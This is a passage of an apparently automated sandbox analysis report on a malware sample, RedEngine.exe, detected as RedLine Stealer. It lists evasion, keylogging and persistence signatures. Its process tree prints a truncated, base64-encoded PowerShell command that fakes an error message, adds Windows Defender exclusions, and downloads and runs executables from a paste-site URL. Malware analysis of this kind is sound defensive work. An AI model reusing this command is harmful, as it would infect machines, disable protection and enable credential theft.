Windows
Analysis Report
RedEngine.exe
Overview
General Information
Detection
Babadeda, RedLine
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule VBS From Appdata
Suricata IDS alerts for network traffic
Yara detected Babadeda
Yara detected Powershell download and execute
Yara detected RedLine Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Adds extensions / path to Windows Defender exclusion list
Command shell drops VBS files
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to infect the boot sector
Encrypted powershell cmdline option found
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: PowerShell DownloadFile
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download and execute files (via powershell)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Very long command line found
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
RedEngine.exe (PID: 7660 cmdline:
"C:\Users\ user\Deskt op\RedEngi ne.exe" MD5: 4FBB04C9E3AA983CBFC4980A7B5B7041) powershell.exe (PID: 7768 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -EncodedCo mmand "PAA jAGIAbAB3A CMAPgBTAHQ AYQByAHQAL QBQAHIAbwB jAGUAcwBzA CAAcABvAHc AZQByAHMAa ABlAGwAbAA gAC0AVwBpA G4AZABvAHc AUwB0AHkAb ABlACAASAB pAGQAZABlA G4AIAAtAEE AcgBnAHUAb QBlAG4AdAB MAGkAcwB0A CAAIgBBAGQ AZAAtAFQAe QBwAGUAIAA tAEEAcwBzA GUAbQBiAGw AeQBOAGEAb QBlACAAUwB 5AHMAdABlA G0ALgBXAGk AbgBkAG8Ad wBzAC4ARgB vAHIAbQBzA DsAPAAjAGE AdAByACMAP gBbAFMAeQB zAHQAZQBtA C4AVwBpAG4 AZABvAHcAc wAuAEYAbwB yAG0AcwAuA E0AZQBzAHM AYQBnAGUAQ gBvAHgAXQA 6ADoAUwBoA G8AdwAoACc ARQByAHIAb wByACAAIwA 4ADEAOQA6A CAAQwBhAG4 AbgBvAHQAI ABzAHQAYQB yAHQAIABkA HUAZQAgAHQ AbwAgAG0Aa QBzAHMAaQB uAGcAIABkA GUAcABlAG4 AZABlAG4AY wBpAGUAcwA sACAAcABsA GUAYQBzAGU AIABpAG4Ac wB0AGEAbAB sACAAYQBsA GwAIAB0AGg AZQAgAGQAZ QBwAGUAbgB kAGUAbgBjA GkAZQBzACA AcgBlAHEAd QBpAHIAZQB kAC4AJwAsA CcAJwAsACc ATwBLACcAL AAnAEUAcgB yAG8AcgAnA CkAPAAjAGI AcQBzACMAP gA7ACIAOwA 8ACMAZQBtA HYAIwA+ACA AQQBkAGQAL QBNAHAAUAB yAGUAZgBlA HIAZQBuAGM AZQAgADwAI wB1AGoAZgA jAD4AIAAtA EUAeABjAGw AdQBzAGkAb wBuAFAAYQB 0AGgAIABAA CgAJABlAG4 AdgA6AFUAc wBlAHIAUAB yAG8AZgBpA GwAZQAsACQ AZQBuAHYAO gBTAHkAcwB 0AGUAbQBEA HIAaQB2AGU AKQAgADwAI wB1AHEAbQA jAD4AIAAtA EYAbwByAGM AZQAgADwAI wB3AHcAeAA jAD4AOwAkA HcAYwAgAD0 AIAAoAE4AZ QB3AC0ATwB iAGoAZQBjA HQAIABTAHk AcwB0AGUAb QAuAE4AZQB 0AC4AVwBlA GIAQwBsAGk AZQBuAHQAK QA7ACQAbAB uAGsAIAA9A CAAJAB3AGM ALgBEAG8Ad wBuAGwAbwB hAGQAUwB0A HIAaQBuAGc AKAAnAGgAd AB0AHAAcwA 6AC8ALwByA GUAbgB0AHI AeQAuAG8Ac gBnAC8AcAB hAG4AYwBlA GsANgAxADE AMQAxADEAM QAxADEAMQA xADEAMQAxA C8AcgBhAHc AJwApAC4AU wBwAGwAaQB 0ACgAWwBzA HQAcgBpAG4 AZwBbAF0AX QAiAGAAcgB gAG4AIgAsA CAAWwBTAHQ AcgBpAG4AZ wBTAHAAbAB pAHQATwBwA HQAaQBvAG4 AcwBdADoAO gBOAG8AbgB lACkAOwAgA CQAZgBuACA APQAgAFsAU wB5AHMAdAB lAG0ALgBJA E8ALgBQAGE AdABoAF0AO gA6AEcAZQB 0AFIAYQBuA GQAbwBtAEY AaQBsAGUAT gBhAG0AZQA oACkAOwAgA GYAbwByACA AKAAkAGkAP QAwADsAIAA kAGkAIAAtA GwAdAAgACQ AbABuAGsAL gBMAGUAbgB nAHQAaAA7A CAAJABpACs AKwApACAAe wAgACQAdwB jAC4ARABvA HcAbgBsAG8 AYQBkAEYAa QBsAGUAKAA kAGwAbgBrA FsAJABpAF0 ALAAgADwAI wBtAGMAdAA jAD4AIAAoA EoAbwBpAG4 ALQBQAGEAd ABoACAAPAA jAGoAbQBpA CMAPgAgAC0 AUABhAHQAa AAgACQAZQB uAHYAOgBBA HAAcABEAGE AdABhACAAP AAjAGkAZwB uACMAPgAgA C0AQwBoAGk AbABkAFAAY QB0AGgAIAA oACQAZgBuA CAAKwAgACQ AaQAuAFQAb wBTAHQAcgB pAG4AZwAoA CkAIAArACA AJwAuAGUAe ABlACcAKQA pACkAIAB9A DwAIwB2AGk AeAAjAD4AO wAgAGYAbwB yACAAKAAkA GkAPQAwADs AIAAkAGkAI AAtAGwAdAA gACQAbABuA GsALgBMAGU AbgBnAHQAa AA7ACAAJAB pACsAKwApA CAAewAgAFM AdABhAHIAd AAtAFAAcgB vAGMAZQBzA HMAIAAtAEY AaQBsAGUAU ABhAHQAaAA gADwAIwB3A GUAdAAjAD4 AIAAoAEoAb wBpAG4ALQB QAGEAdABoA CAALQBQAGE AdABoACAAJ ABlAG4AdgA 6AEEAcABwA EQAYQB0AGE AIAA8ACMAd gB2AHgAIwA +ACAALQBDA GgAaQBsAGQ AUABhAHQAa